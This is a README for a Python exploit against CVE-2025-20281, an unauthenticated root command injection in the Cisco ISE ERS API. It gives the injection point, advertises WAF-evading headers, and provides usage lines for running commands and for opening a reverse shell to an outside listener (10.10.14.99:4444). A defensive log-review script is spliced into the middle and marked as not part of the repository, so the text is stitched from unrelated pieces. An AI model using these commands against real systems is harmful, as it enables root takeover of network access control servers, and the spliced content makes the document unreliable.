Unauthenticated Remote Code Execution exploit for CVE-2025-20281 in Cisco ISE ERS API. Execute commands or launch reverse shells as root — no authentication required.

# CVE-2025-20281 — Cisco ISE ERS API Unauthenticated RCE Exploit
This repository contains a Python 3 proof-of-concept exploit for **CVE-2025-20281**, a critical vulnerability in **Cisco Identity Services Engine (ISE)** that allows **unauthenticated remote code execution (RCE) as root** via the ERS API.
---
## 🩻 Vulnerability Overview
> The Cisco ISE ERS `/ers/sdk#_` endpoint fails to validate authentication when processing user creation requests.
> By injecting shell commands into the `name` parameter of the `InternalUser` object, attackers can achieve command execution as root.
- **CVE ID**: [CVE-2025-20281](https://nvd.nist.gov/vuln/detail/CVE-2025-20281)
- **Affected**: Cisco ISE PAN (Policy Admin Node) with ERS enabled
- **Severity**: Critical (CVSS 9.8)
- **Authentication**: None required
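
A defender-side check for the pattern described above, as an added example that is not part of this repository: it reviews captured ERS requests and flags unauthenticated writes and `InternalUser` names outside an allow-list. The record schema, the JSON body shape, the allow-list and the sample records are assumptions constructed for illustration.

```python
import json
import re

# Assumed allow-list for account names (illustrative policy, not Cisco's rule).
SAFE_NAME = re.compile(r"[A-Za-z0-9._@-]{1,64}")

def internal_user_name(body):
    """Return InternalUser.name from a JSON request body, or None if absent."""
    try:
        doc = json.loads(body)
    except (TypeError, ValueError):
        return None
    user = doc.get("InternalUser") if isinstance(doc, dict) else None
    name = user.get("name") if isinstance(user, dict) else None
    return name if isinstance(name, str) else None

def review_request(record):
    """Return findings for one request record (hypothetical proxy-log schema)."""
    findings = []
    if record.get("method") != "POST" or not record.get("path", "").startswith("/ers/"):
        return findings
    # The overview states no authentication is required, so a write without
    # credentials is itself worth flagging.
    if not record.get("authorization"):
        findings.append("unauthenticated ERS write")
    name = internal_user_name(record.get("body", ""))
    if name is not None and not SAFE_NAME.fullmatch(name):
        findings.append("InternalUser.name outside allow-list")
    return findings

# Constructed sample records; not captured traffic.
SAMPLES = [
    {"method": "POST", "path": "/ers/sdk", "authorization": "Basic <redacted>",
     "body": '{"InternalUser": {"name": "jsmith"}}'},
    {"method": "POST", "path": "/ers/sdk", "authorization": "",
     "body": '{"InternalUser": {"name": "tmp;id"}}'},
    {"method": "GET", "path": "/ers/sdk", "authorization": "", "body": ""},
]

if __name__ == "__main__":
    for rec in SAMPLES:
        print(rec["method"], rec["path"], review_request(rec))
```

An allow-list is used rather than a list of known-bad characters so that unexpected encodings of shell syntax are flagged as well.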
---
## ⚙️ Features
- ✅ Run arbitrary commands (`--cmd`)
- ✅ Quick test with `--whoami`
- ✅ Launch reverse shells (`--reverse`)
- ✅ No authentication or session token required
- ✅ SSL warning suppression and clean output
- ✅ Legitimate headers to bypass simple WAFs
---
## 🚀 Usage
```bash
python3 CVE-2025-20281.py TARGET [--whoami | --cmd "id" | --reverse LHOST LPORT]
```
### Examples
Test command:
```bash
python3 CVE-2025-20281.py 192.168.1.10 --whoami
```
Run custom command:
```bash
python3 CVE-2025-20281.py 192.168.1.10 --cmd "id && hostname"
```
Reverse shell:
```bash
python3 CVE-2025-20281.py 192.168.1.10 --reverse 10.10.14.99 4444
```
---
## ⚠️ Legal Disclaimer
This code is provided for educational and authorized testing purposes only.
Do not use this software against networks or systems you do not own or have permission to test.
---
## 🙏 Credits
- Vulnerability: Disclosed via Cisco advisory
- PoC Refactor: illdeed